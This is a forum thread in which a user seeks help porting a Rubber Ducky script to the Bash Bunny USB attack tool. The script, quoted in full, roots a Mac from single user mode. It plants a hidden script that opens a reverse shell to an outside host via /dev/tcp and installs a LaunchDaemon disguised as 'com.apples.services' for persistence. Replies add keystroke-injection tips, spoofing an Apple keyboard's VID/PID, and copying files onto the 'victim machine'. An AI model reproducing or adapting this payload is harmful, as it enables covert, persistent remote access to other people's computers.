Help idiots guide to use Rubberducky code to Basbunny

[valentino00776]

By the way the hello world payload was tested on a windows pc not mac

My script is for mac with terminal already opened.

just wont type

[valentino00776]

This is the original script for Rubber Ducky

 

source.txt

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69

REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER

3) Compile and install the script.

From within the ducky decoder folder, execute:

Move your inject.bin over to the ducky.

4) Boot into single user mode (Command – S).

5) At the command prompt, plug in ducky.

6) Catch your shell.

[GermanNoob]

21 hours ago, valentino00776 said:

By the way the hello world payload was tested on a windows pc not mac

My script is for mac with terminal already opened.

just wont type

Well, it would be good to test the HelloWorld payload on the machine you got problems with... So give it a test on the Mac...

If that works, I don't see why the other payload won't work (if you have the terminal already open AND in focus)... But of course you could add the following command to be sure, that the focus is set right:

Q GUI SPACE
Q STRING terminal
Q ENTER
Q DELAY 2000

 

[illwill]

Violation of CoC

Edited October 8, 2017 by illwill
Violation of CoC

[Dave-ee Jones]

41 minutes ago, illwill said:

you need to escape bash special chars with backslashes or quotes or theyll be translated by the bashbunny as commands

check out how I did it to my powershell script here

https://forums.hak5.org/index.php?/topic/40385-escaping-ducky-commands/&do=findComment&comment=287660

I would say it doesn't like those special characters as well. What could be best is using a separate text file and then just saying something like

QUACK switch1/file.txt

and let it run them line by line in the file. Would definitely be easier for your larger amount of code.

[valentino00776]

Ive tried hello world on mac and it works

[valentino00776]

ive also tried 

QUACK switch1/file.txt

Still no luck

Ive looked at  special characters as well but not experienced enough to know which ones and where ?

could anyone do the script above so i can see and learn PLEASEEEEESSSS 

[GermanNoob]

On 13.3.2017 at 7:28 PM, valentino00776 said:

it works with rubber ducky but cant get it to run on the Bashbunny

The light goes red and green but no keystrokes 

As the script itself (except the QUACK commands) functions, try the following:

Open your script (the one with the QUACK commands to be sure) on a linux machine or the Mac with nano. the first lets say three QUACK command lines with ctrl + k to ensure that the whole line is killed and then retype those three lines manually. Save the file and give it a try...

[valentino00776]

Thanks GermanNoob

Tried that but no change ?

[GermanNoob]

No change means that only LED lights change?

[valentino00776]

Sorry GermanNoob

the lights just stay the same 

starts green the stops on red green

I've tried to escape the special characters but i might as well try brain surgery. Got no idea where and which  

[GermanNoob]

@valentino00776

then lets get creative.... lol

take the "hello world" that worked, copy all lines of it into your payload script at the beginning.

I just want to see, if the whole file doesn't work. It seems like that, if you have everything done I said before. So, hopefully this test will also fail (nothing QUAKed like in test with the three rewritten lines). The bad news in this case: You will have to rewrite your script completely without any copying...

[TheHermit]

I have created a site that lets you very easily create duck code for use on the bunny. 

https://bunnytoolkit.com/create/

On step two select the "Ducky Code" template. 

On the next page that appears

Under payload.txt change SET_LANGUAGE gb to SET_LANGUAGE us

Then enter any ducky code you like in ducky_code.txt

Download either the tar or the gz and then just put these contents in to a switch position. 

 

If you want to use languages other than US you will need to install the DuckToolkit library using the Installer from the github - Details here -

 

You can also use the ducky template payload - https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/DuckyTemplate

 

 

 

[valentino00776]

I think i've managed to identify the problem

Seems the mac doesn't recognize the bash bunny in single user mode so types nothing.

Any ideas guys ????

 

[GermanNoob]

Hmm, I'm not aware of the single user mode. Maybe you need to set the VID / PID to an Apple Keyboard?

On 15.3.2017 at 0:24 PM, valentino00776 said:

Ive tried hello world on mac and it works

This wasn't in single user mode?

[valentino00776]

no wont work in single mode buddy

Another question 

Is there away to copy a folder from bashbunny to mac in switch mode ?

[GermanNoob]

20 minutes ago, valentino00776 said:

Is there away to copy a folder from bashbunny to mac in switch mode ?

As this command would have to be executed by the target, you would need to insert a copy command with QUAK... If you are still talking of Single User mode this will probably not work...

Can you tell me why you are attacking the machine in single user mode? Just curious to get an idea...

[valentino00776]

The original script by Patrick Mosca works in single user mode.

It's a quick plugin and go and doesn't need access to passwords.

Works brilliantly with rubber ducky.

With my second question once gained access i wont to upload a folder to victim machine automated using bash bunny

 

Thanks buddy

[GermanNoob]

1 hour ago, valentino00776 said:

With my second question once gained access i wont to upload a folder to victim machine automated using bash bunny

Hmm, as you are already aware of terminal commands, it shouldn't be a problem for you to do it... So please excuse if the following answer isn't very helpful. You might need to specify you problem...

To copy something onto the victim machine:

1. Place "whatever to copy" on the BashBunny
2. Open a terminal on the Mac 
3. type the copy command, which would look something like this:

Q cp -r /Volumes/BashBunny/yoursourcefolder /yourdestinationfolder

 

[valentino00776]

thanks managed to copy

Just the single user mode left

[GermanNoob]

Good to hear...

Last idea for single user mode: Maybe MacOS is restrictive in this mode according which devices it accepts. So maybe you try to change the VID PID within you ATTACKMODE command to an Apple keyboard. It maybe helpful to know which kind of Mac you are penetrating. So search for VID PID and the specified device on DuckDuckGo